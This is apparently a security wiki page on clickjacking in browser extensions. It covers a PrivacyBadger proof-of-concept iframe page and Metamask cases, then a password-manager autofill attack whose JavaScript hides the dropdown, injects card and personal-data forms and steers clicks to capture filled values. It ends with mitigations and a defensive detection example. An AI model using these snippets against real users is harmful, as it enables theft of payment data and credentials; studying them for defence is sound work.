BrowExt - ClickJacking


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

This page will exploit a ClickJacking vulnerability in a browser extension.
If you don't know what ClickJacking is, check:

Clickjacking

Extensions contain the file manifest.json, and that JSON file has a field web_accessible_resources. Here's what the Chrome docs say about it:

These resources would then be available in a webpage via the URL chrome-extension://[PACKAGE ID]/[PATH], which can be generated with the extension.getURL method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.

The web_accessible_resources in a browser extension are not just accessible via the web; they also operate with the extension's inherent privileges. This means they have the capability to:

  • Change the state of the extension
  • Load additional resources
  • Interact with the browser to a certain extent

However, this feature introduces a security risk. If a resource inside web_accessible_resources has any significant functionality, an attacker can embed that resource in an external web page. Unsuspecting users visiting such a page may inadvertently trigger the embedded resource. Triggering it can have unintended consequences, depending on the permissions and capabilities of the extension's resources.

Example - PrivacyBadger

In the PrivacyBadger extension, a vulnerability was identified related to the skin/ directory being declared as web_accessible_resources in the following way (check the original blog post):

```json
"web_accessible_resources": [
  "skin/*",
  "icons/*"
]
```

This configuration led to a potential security issue. Specifically, the file skin/popup.html, which is rendered when interacting with the PrivacyBadger icon in the browser, could be embedded inside an iframe. That embedding could be abused to trick users into inadvertently clicking "Disable PrivacyBadger for this Website". Such an action would compromise the user's privacy by disabling PrivacyBadger's protection and potentially exposing the user to increased tracking. A visual demonstration of this exploit can be seen in the ClickJacking video example provided at https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm.

To address this vulnerability, a straightforward fix was implemented: removing /skin/* from the web_accessible_resources list. This change mitigated the risk by ensuring that the contents of the skin/ directory could no longer be accessed or manipulated through web-accessible resources.

PoC

```html
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->

<style>
  /* The extension popup is loaded in a near-invisible iframe stacked over the page */
  iframe {
    width: 430px;
    height: 300px;
    opacity: 0.01;
    float: top;
    position: absolute;
  }

  #stuff {
    float: top;
    position: absolute;
  }

  /* Decoy button placed where the popup's "Disable" control ends up */
  button {
    float: top;
    position: absolute;
    top: 168px;
    left: 100px;
  }
</style>

<div id="stuff">
  <h1>Click the button</h1>
  <button id="button">click me</button>
</div>

<iframe
  src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```

Metamask Example

A blog post about a ClickJacking in Metamask can be found here. In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was https: or http: (not chrome:, for example).

Another ClickJacking fixed in the Metamask extension was that users were able to Click to whitelist when a page was suspected of being phishing, because of "web_accessible_resources": ["inpage.js", "phishing.html"]. Since that page was vulnerable to ClickJacking, an attacker could abuse it by showing something that looks normal to make the victim click Click to whitelist without noticing, and then return to the phishing page, which would now be whitelisted.

Steam Inventory Helper Example

Check the following page to see how an XSS in a browser extension was chained with a ClickJacking vulnerability:

BrowExt - XSS Example


DOM-based Extension Clickjacking (Password Manager Autofill UIs)

Classic extension clickjacking abuses web_accessible_resources misconfigurations to iframe privileged extension HTML and hijack user clicks. A newer variant, DOM-based extension clickjacking, targets autofill dropdowns that password managers inject directly into the page's DOM and uses CSS/DOM tricks to hide or obscure them while they remain clickable. A single hijacked click can select a stored item and fill attacker-controlled inputs with sensitive data.

Threat model

  • The attacker controls a web page (or obtains XSS, a subdomain takeover or cache poisoning on a related domain).
  • The victim has a password manager extension installed and unlocked (some autofill still works even when the manager is nominally locked).
  • At least one user click is induced (overlaid cookie banners, dialogs, CAPTCHAs, games, etc.).

Attack flow (manual autofill)

  1. Inject a form that is not displayed but can still receive focus (login/PII/credit-card fields).
  2. Focus an input so that the extension's autofill dropdown appears next to the field.
  3. Hide or cover the extension UI while it remains clickable.
  4. Place a visible control under the hidden dropdown to induce a click that selects an item.
  5. Read the filled values from the attacker's form and exfiltrate them.

How to hide the autofill UI

  • Extension element
    • Root element opacity (generic):

```js
// Reduce or nullify opacity of the extension root
// Works when the root element is attached in the page DOM
const root = document.querySelector('protonpass-root')
if (root) root.style.opacity = 0
```

    • Child element inside an open ShadowRoot (dynamic tag name, hide the inner iframe):

```js
// Find dynamic root like <protonpass-root-xyz> and hide its child iframe
const root = Array.from(document.querySelectorAll('*'))
  .find(el => el.tagName.toLowerCase().startsWith('protonpass-root-'))
if (root?.shadowRoot) {
  const frame = root.shadowRoot.querySelector('iframe')
  if (frame) frame.style.cssText += 'opacity:0 !important;'
}
```

  • Parent element
    • BODY/HTML opacity tricks that make the extension UI invisible while the page looks normal (e.g. a screenshot as background):

```js
// Hide full page, then reveal a tiny amount to keep clicks working
document.body.style.opacity = 0
// Optional: Show a screenshot/lookalike to avoid a blank screen
// document.documentElement.style.backgroundImage = 'url(website.png)'

// Inject a credit-card form and focus to trigger dropdown
/* create #cardform with #cardnumber, #expiry, #cvc */
document.getElementById('cardnumber').focus()
// Make body barely visible to allow user interaction
document.body.style.opacity = '0.001'

function getCardValues() {
  const num = document.getElementById('cardnumber').value
  const exp = document.getElementById('expiry').value
  const cvc = document.getElementById('cvc').value
  // exfiltrate via XHR/fetch/websocket
}
```

  • Overlay
    • Partial overlay: cover everything except a few pixels so the dropdown remains clickable (make sure the attacker overlay is last in the DOM with the maximum z-index, or use the Top Layer).
    • Full overlay using pointer-events:none so the click passes through to the hidden dropdown; make it persistent with the Popover API:

```html
<div id="overlay" popover style="pointer-events:none;">Cookie consent</div>
<script>
  overlay.showPopover()
  // Inject a personal data form and focus to trigger dropdown
  /* create #personalform with #name/#email/#phone/... */
  document.getElementById('name').focus()
  function getData(){ /* read + exfil values on change */ }
</script>
```

Steering the victim's click

  • Static placement: put the hidden dropdown under a control the user is likely to trust, such as "Accept cookies", "Close", or a CAPTCHA box.
  • Follow the mouse: move the focused input under the cursor so the dropdown follows it; refocus periodically so that a single click anywhere selects an item:

```js
const f = document.getElementById('name')
document.addEventListener('mousemove', e => {
  personalform.style = `top:${e.pageY-50}px;left:${e.pageX-100}px;position:absolute;`
  // some managers hide the dropdown if focus is lost; refocus slowly
  setTimeout(() => f.focus(), 100)
})
```

Impact and scenarios

  • Attacker-controlled website: a single induced click can exfiltrate credit-card data (number/expiry/CVC) and personal information (name, email, phone, address, date of birth (DOB)) that is not scoped to a domain.
  • Trusted website with XSS/subdomain takeover/cache poisoning: multi-click theft of credentials (username/password) and TOTP, because many managers autofill on related subdomains or parent domains (e.g. *.example.com).
  • Passkeys: if the RP does not bind WebAuthn challenges to the session, XSS can capture the signed assertion; DOM-based clickjacking hides the passkey prompt to obtain the confirmation click from the user.

Limitations

  • Requires at least one user click and good pixel alignment (realistic overlays make the click easy to induce).
  • Auto-lock/logout reduces the exploitation window; some managers still autofill even when "locked".

Extension developer mitigations

  • Render the autofill UI in the Top Layer (Popover API) or otherwise ensure it sits above the page's stacking order; avoid being buried under page-driven overlays.
  • Resist CSS tampering: prefer a closed Shadow DOM and watch the UI root with a MutationObserver for suspicious style changes.
  • Detect malicious overlays before filling: enumerate other top-layer/popover elements, temporarily disable pointer-events:none, and use elementsFromPoint() to detect occlusion; close the UI if overlays are present.
  • Detect dangerous <body>/<html> opacity or style changes before and after rendering.
  • For iframe-based issues: scope MV3 web_accessible_resources matches carefully and avoid exposing HTML UIs; for HTML that cannot be avoided, send X-Frame-Options: DENY or Content-Security-Policy: frame-ancestors 'none'.
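The overlay, top-layer and opacity checks from the list above, as an added example that is not Proton Pass's or any password manager's own code. It assumes a content script that knows its dropdown root element and a few probe coordinates inside it; the 0.9 opacity threshold, the `env` adapter shape, the `:popover-open, dialog[open]` selector and the fake DOM in `demo()` are this example's own choices.

```javascript
// Added example (not any password manager's code): occlusion check for an injected
// autofill dropdown; DOM access comes in via `env`, so it also runs under Node.
// env = { getStyle(el), contains(a, b), topLayerElements(), elementsFromPoint(x, y) }
// probes = page coordinates inside the dropdown (e.g. the centre of each item).
function assessAutofillUi(uiRoot, probes, env) {
  const reasons = [];
  // CSS opacity multiplies down the ancestor chain (opacity:0.001 on <body> hides everything); 0.9 is an assumed threshold.
  let opacity = 1;
  for (let n = uiRoot; n; n = n.parentElement) opacity *= parseFloat(env.getStyle(n).opacity);
  if (opacity < 0.9) reasons.push(`effective opacity ${opacity}`);
  // Page-owned popovers and modal dialogs sit in the top layer, above any z-index.
  const foreign = env.topLayerElements().filter(e => !env.contains(uiRoot, e));
  if (foreign.length) reasons.push(`${foreign.length} foreign top-layer element(s)`);
  // The dropdown itself must be the topmost hit at every probe point.
  for (const [x, y] of probes) {
    const hit = env.elementsFromPoint(x, y)[0];
    if (!hit || !env.contains(uiRoot, hit)) reasons.push(`occluded at (${x},${y})`);
  }
  return { safe: reasons.length === 0, reasons };
}

// Browser adapter for a content script. Hit testing skips pointer-events:none
// overlays, so open popovers are forced to `auto` while probing, then restored.
function browserEnv(doc) {
  const top = () => Array.from(doc.querySelectorAll(':popover-open, dialog[open]'));
  return {
    getStyle: el => doc.defaultView.getComputedStyle(el),
    contains: (a, b) => a.contains(b), topLayerElements: top,
    elementsFromPoint(x, y) {
      const saved = top().map(el => [el, el.style.pointerEvents]);
      saved.forEach(([el]) => { el.style.pointerEvents = 'auto'; });
      try { return doc.elementsFromPoint(x, y); }
      finally { saved.forEach(([el, v]) => { el.style.pointerEvents = v; }); }
    },
  };
}

// Constructed fake DOM (no browser): bodyOpacity 1 and no overlay is a clean page;
// 0.001 plus a pointer-events:none popover is the page from the section above.
function demo(bodyOpacity, overlayPresent) {
  const body = { opacity: String(bodyOpacity), parentElement: null };
  const ui = { opacity: '1', parentElement: body };
  const overlay = { opacity: '1', parentElement: body };
  const isIn = (a, b) => b === a || (b !== null && isIn(a, b.parentElement));
  return assessAutofillUi(ui, [[120, 200]], {
    getStyle: el => ({ opacity: el.opacity }), contains: isIn,
    topLayerElements: () => (overlayPresent ? [overlay] : []),
    elementsFromPoint: () => (overlayPresent ? [overlay, ui] : [ui]),
  });
}
```

In a real content script the call is `assessAutofillUi(dropdownRoot, probes, browserEnv(document))`, run right before showing the dropdown and again before acting on a click.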
